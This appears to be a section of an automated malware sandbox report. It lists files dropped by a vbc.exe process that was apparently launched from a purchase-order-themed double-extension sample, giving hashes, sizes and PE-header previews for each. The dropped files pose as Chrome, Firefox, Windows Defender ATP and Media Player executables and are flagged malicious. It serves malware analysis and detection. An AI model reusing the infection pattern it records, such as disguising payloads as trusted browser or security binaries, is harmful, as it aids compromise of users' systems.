                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L......4K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                                    C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4897792
                                                                                                                                                                    Entropy (8bit):6.829770450947602
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:P8ErDqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKj:Ev2gM+qwXLg7pPgw/DSZ9PD527BWG
                                                                                                                                                                    MD5:B19EC0932A4F12E899583472D68FA02A
                                                                                                                                                                    SHA1:2467B482FE4CB554F1BA4F0FFD44A996494CC29C
                                                                                                                                                                    SHA-256:E5B7576F9846BFA716E4B6CF39A7F1DF16582A78EC50CE777D5AB63FACB74E97
                                                                                                                                                                    SHA-512:768E31BDB055FEE033C9D3CA71C1D94DAFDC2DEED021F03AEB22567E5BCDF87A12A9C0DEDACF25A6639C2EF30E7F04515F0E641C15CA26B1E5837D07D5C82EF9
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.....+pK... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                                    C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2156544
                                                                                                                                                                    Entropy (8bit):6.953590297449121
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:StjqL8fH+8aUbp8D/8+xQWA1sqjnhMgeiCl7G0nehbGZpbD:qjKK+81FI/85vDmg27RnWGj
                                                                                                                                                                    MD5:06FA822B548C77730F1735784B68166E
                                                                                                                                                                    SHA1:5826E012C8E0332040891B51A5F2316AF57186B3
                                                                                                                                                                    SHA-256:1C22623059BD2E902F6FDC7170F0CE74E95F81984235BEDA94C3F604D66F712C
                                                                                                                                                                    SHA-512:814762F424DCA25E343C37913C7E409C511098351FF322BEE9057DA7A359090EDD47B193E86E246DD9EDAA9682AA229BA7A8DFA87413E8B20F755E9E0B97C423
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......F.....................@.............................P"......L!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................

                                                                                                                                                                    C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2370560
                                                                                                                                                                    Entropy (8bit):7.032403287146288
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:rAMsOu3JfCIGnZuTodRFYKBrFxbWp5Dmg27RnWGj:rAMa38ZuTSmD527BWG
                                                                                                                                                                    MD5:C2E01E0D0EC3AEA55609EDA9883C220F
                                                                                                                                                                    SHA1:38733487B15B48C34B03147BEBB6A84C6C929DA7
                                                                                                                                                                    SHA-256:A7812A3BE06D9E19D116319A06F1CB65E0CD82E95C7FF55EBDB1CBFD2DF5B26F
                                                                                                                                                                    SHA-512:B5C2F1C2C11FF8BDBB7A738B86376691DACF4B3CA6772B492F7B7299D6210FDF6D763D8E5CA056B7C4017B18169C96FBDA93F965AAB8C5095786F6FD591D6165
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e..........".................0..........@..............................%......C$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................

                                                                                                                                                                    C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1984512
                                                                                                                                                                    Entropy (8bit):7.104348808404516
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:1wbK7tnhD4aH6wD2Krx5NgOOagtE8F9sqjnhMgeiCl7G0nehbGZpbD:1SK7Fhslq2EPfOfEoDmg27RnWGj
                                                                                                                                                                    MD5:62D7BE7926330B5798A303BADA330473
                                                                                                                                                                    SHA1:B02A92BB15DC50BAE30A49FA681ED8F42D9659CD
                                                                                                                                                                    SHA-256:EABC5A84390F829B0F72BDF5DDE1124EACD50973428C8A6169D0EA109DFA7647
                                                                                                                                                                    SHA-512:9A77137FBF128FA18F753784B186021AD1D3C9118D1F1FA5000ADDDAE18309E02228904167A86525FBE125AE6827A002D83240238E1F4BD39E311B950E433EE4
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."............................@....................................D..... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................

                                                                                                                                                                    C:\Program Files\Google\Chrome\Application\chrome_proxy.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1779712
                                                                                                                                                                    Entropy (8bit):7.1580792784354355
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:LKI7Twj5KDHxJ1FxyD+/wsG1Tbbc9sqjnhMgeiCl7G0nehbGZpbD:Lv7e0j31mD+/wDfbGDmg27RnWGj
                                                                                                                                                                    MD5:CA195BEC5473B818BA2642965AD22F63
                                                                                                                                                                    SHA1:76E3B94FD78AAFB937BCD00818C489776A1D22CC
                                                                                                                                                                    SHA-256:51BEB000F026A0B6C026AFEB0A6F9FC3632F1EF0BE66B60439D2073B93D31CA5
                                                                                                                                                                    SHA-512:AD448A0AFE752FA7F6F954588694011979082A1EEDE5C7C757F536B9C24078D678B30BFD3278984B9FCEE021980C4DDD4E026659AE0A6EDD17ACCBC5A3884482
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."..........B.................@.......................................... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).......*..................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.......*..............@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................

                                                                                                                                                                    C:\Program Files\Mozilla Firefox\crashreporter.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1378304
                                                                                                                                                                    Entropy (8bit):5.377452042537901
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:RQUVPDHhSWXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:CyhSWsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:68016A02800BAAB45108CA3D2EBF4832
                                                                                                                                                                    SHA1:483F8BF91F52EA35D0C1145BA715ADAE1DC98296
                                                                                                                                                                    SHA-256:E72572C821F9C534354AB707195F85971141528142132CA8970FF0690D38BB31
                                                                                                                                                                    SHA-512:3C3233342676D84849E94417530488649B5110FF83C0B8F113681958F7E732D196FF7C27797264CF07500665878441016D9282884C605596239688C37CE17EC8
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.............................p........... ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Mozilla Firefox\default-browser-agent.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1286656
                                                                                                                                                                    Entropy (8bit):7.22212252444987
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:msFfc1VyFn5UQn652bO4HFsqjnhMgeiCl7G0nehbGZpbD:msFcIn5rJ/Dmg27RnWGj
                                                                                                                                                                    MD5:8D06F93D74D4274B4348B6C3F38E1FF0
                                                                                                                                                                    SHA1:A7A44B9BF5012F8633C7D40E900F5E1CF3FDF519
                                                                                                                                                                    SHA-256:7F4CA0815409803338DAC9736A13588FFF99740B067FCC63EDBB3B494646F962
                                                                                                                                                                    SHA-512:0D5B64AFD79095547F37292BA66FDC83C151626893FF18A6A5D2BEB07146E636C52972E77DC8ADAED6751FFD4160DE6962766672BC9CB03B9E905D2D3B225DBE
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@....................................q..... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Mozilla Firefox\firefox.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1246208
                                                                                                                                                                    Entropy (8bit):7.494297674597622
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:Zt9o6p4xQbiKI69wpemIwpel9ysqjnhMgeiCl7G0nehbGZpbD:Zt9faQbtl2peapelsDmg27RnWGj
                                                                                                                                                                    MD5:8BF7FBE7384CEC16C575F2CBE5C3B225
                                                                                                                                                                    SHA1:44DC89818AA111FD97E23D21E5AC5610E324FDB6
                                                                                                                                                                    SHA-256:99AD5BB9EBC325E18197809206ABE16DC4D1421D5F93208874C704AB2253CDFE
                                                                                                                                                                    SHA-512:3DDE349AF2E0CF61D1947BF3112E44F31090F6176881D58FE312E65BE611C1BEC6961D6D78A2302160C4EA2478894ED931D59DD0ED1C4E7481B6B8745AD34E8D
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@....................................*..... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Mozilla Firefox\maintenanceservice.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1356800
                                                                                                                                                                    Entropy (8bit):5.34785709875411
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:IQVTZu0JtsqjnhMgeiCl7G0nehbGZpbD:nVTZucDmg27RnWGj
                                                                                                                                                                    MD5:C94AE04B5DB3D97303DDB9E3549E9F8C
                                                                                                                                                                    SHA1:59B8EBE238864624F39399DA92E5A643484091B8
                                                                                                                                                                    SHA-256:7F4E11BDAAEE994A2CC99F46470C2DF57D7651DFD491AB083CC2DDE3D174ED9C
                                                                                                                                                                    SHA-512:46BEB6913B97D96410D0F9072AD8AC4CE40EE6AD2E927440A16AD29940377E05557C8FDE3662EBEBED20222DA96A116BFA2A79DFA968E641F81B5AFB00848B75
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P............ .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Mozilla Firefox\minidump-analyzer.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1344000
                                                                                                                                                                    Entropy (8bit):6.808402315870007
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:ZC1vpgXcZHz7sqjnhMgeiCl7G0nehbGZpbD:ZC1vpIcNvDmg27RnWGj
                                                                                                                                                                    MD5:79CE77F95747FFF18E30B26927679155
                                                                                                                                                                    SHA1:AAE2594FA8338C3C57823BC8882DD02533F78FE7
                                                                                                                                                                    SHA-256:E857D140F25A719F39C65B100E63B6A1B57CBB8408DA78E971A96A7DFF0FB813
                                                                                                                                                                    SHA-512:8B007473E837F3347F9FB73608B866E392AFE2F2D62D8DCE37EEBF37FD78438356B6CFD62BAD1A2E41CFA257A066D1FBA20AA6FE797A39515612BCE8AEED33DA
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@.......................................... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Mozilla Firefox\pingsender.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1200128
                                                                                                                                                                    Entropy (8bit):5.140043544149065
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:xSwjnXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:xvnsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:9FEB05E1EE1835574C259610F65FEFDE
                                                                                                                                                                    SHA1:E7536A7832149BCB7C296A81F02EF5575213B680
                                                                                                                                                                    SHA-256:3D3E948D4680F57F7F6E74499A6C3641F00AF3C7E1D74071DA3A8695F6FF836C
                                                                                                                                                                    SHA-512:A911EB1DDAC0BA0113656FF1A4B062BA3D5F1A932274EDF4D2D0B353557B1CA18B58366404DC17749EFD28020BD1B7C8405EA9E0317BC17D1CFE1B363674E717
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@.......................................... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...P...p...@..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Mozilla Firefox\plugin-container.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1408512
                                                                                                                                                                    Entropy (8bit):5.44116704203802
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:/WKntIfGp9sqjnhMgeiCl7G0nehbGZpbD:+8Ie3Dmg27RnWGj
                                                                                                                                                                    MD5:97E06E4C368D07B1EA8893369B753049
                                                                                                                                                                    SHA1:72A5ACDCBBF49280D99036AC3896E5297EB44EB3
                                                                                                                                                                    SHA-256:9CCA700422CD4F797345A8B042ACE94A79EE728EAA75A9A918F5F0908C776E74
                                                                                                                                                                    SHA-512:C75CBB790504C587041F291E5BA888A0CF52E4640588B24B5EF05D06298F61B94E305EE1C183EB7DDDBC3ED7849602A69BEF47E60A9FB318976E01FB33098334
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@....................................-:.... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...P.......@...>..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Mozilla Firefox\private_browsing.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1185280
                                                                                                                                                                    Entropy (8bit):5.10330432782649
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:8IhTXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:9TsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:FCEAC56ED8FC7DFCEE437DF7F293511A
                                                                                                                                                                    SHA1:5241679054BBE21F5E13254199696BE235A0E3B1
                                                                                                                                                                    SHA-256:D87C08C920F09A4A38CD7DB6ECA239400381AD381F52CF579BDC71A4C25DACB8
                                                                                                                                                                    SHA-512:6B4C23B50DFC09203F06609BEEDD1763F7AAC6A7032F8F701B3F0DA7A423EE026E85E05E032732D8850341142592D44A8AF002F201580891FD4E9EB028669455
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@....................................eR.... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Mozilla Firefox\updater.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1531904
                                                                                                                                                                    Entropy (8bit):5.421216162529223
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:l8oREwt2ioQ3J+RCsqjnhMgeiCl7G0nehbGZpbD:l8oRpoFGDmg27RnWGj
                                                                                                                                                                    MD5:F58D6EEF9AA0EC05244351083C11EE60
                                                                                                                                                                    SHA1:46F606512ADB873880D46F45D86F1A38A6C2E2B5
                                                                                                                                                                    SHA-256:1812A471F6052EAA7B8429EE94924229385A87288FD5537F271210EFB7983228
                                                                                                                                                                    SHA-512:A964AACC076487709294A4D6B4E83DBEC8FD6E802A26920F7144FFF2F6DD73A46477F4C5CFCC5C68FD47338F48832F67126633C4D7175E8AA8C58DD8C9C81BCA
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@....................................X..... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...P.......@... ..............@...........................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1341952
                                                                                                                                                                    Entropy (8bit):5.238621641138607
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:Cf8HQlDMxHwJ07wCsqjnhMgeiCl7G0nehbGZpbD:CkHQlqwJ0xDmg27RnWGj
                                                                                                                                                                    MD5:9856CF8F35D23AD1DD1E0E4FCF802549
                                                                                                                                                                    SHA1:E2E83B61D9FF2D6E43543E602438671E3DC311B9
                                                                                                                                                                    SHA-256:7288AF1FB11BB28FB21226B1B3585F080056E7E20843D13D695F6DD88FCB4C85
                                                                                                                                                                    SHA-512:63B86663D0E3555CB338A9052C5ABE41D77947CFBB00DD089986B6A5F31AC4AF0E4EF51C0C7167F8C396FA62C6DF4F937138A3F42D2F7D2F198867FDED845B5B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x..............a.......r.......r...............r.......r.......r.......ry......r{......r......Rich....................PE..d...B{.?.........."............................@....................................9..... .......... ......................................8b..........................................T.......................(...................@...(...pa..`....................text............................... ..`.rdata..............................@..@.data....&...........z..............@....pdata........... ..................@..@.didat.. ...........................@....rsrc...............................@..@.reloc...P.......@...:..............@...................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files\Windows Media Player\wmpnetwk.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1534464
                                                                                                                                                                    Entropy (8bit):7.124625010806751
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:aSEmYD6gjGPG45QVDkfXplyTyNsqjnhMgeiCl7G0nehbGZpbD:a5mYD6g2GWQVQf3yTqDmg27RnWGj
                                                                                                                                                                    MD5:D9662B59E9C99542FF0D0C7FB61C2935
                                                                                                                                                                    SHA1:ECD14D1A830C147D12DA2BA145120149F99A20CD
                                                                                                                                                                    SHA-256:E9FBE9A61769DF9ED868CCAC50BB9C3DD92253134FBF7CAD0A6FE03AAFC599FD
                                                                                                                                                                    SHA-512:8D03F7FD51A27E8371E01C544C4062B7C7BCED320326AD904FCD1E7207D7A043718ACA575BBBA62F4A0B261B206892AE6A18F73E14EED7F0413567D92766B7B9
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."x..f..Ef..Ef..EoaKEd..Err.De..Err.DB..Err.Dh..Err.D}..Ef..E...Err.D]..Err'Eg..Err.Dg..ERichf..E........................PE..d..."..m.........."..........4......@:.........@.......................................... .......... ..........................................,............`...N.................. ...T...........................p...................X...h...@....................text.............................. ..`.rdata...\.......^..................@..@.data....Y.......8..................@....pdata...N...`...P..................@..@.didat...............l..............@....rsrc................n..............@..@.reloc..............................@...................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ_PO N89397-GM7287-Order.bat.exe.log

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1216
                                                                                                                                                                    Entropy (8bit):5.34331486778365
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
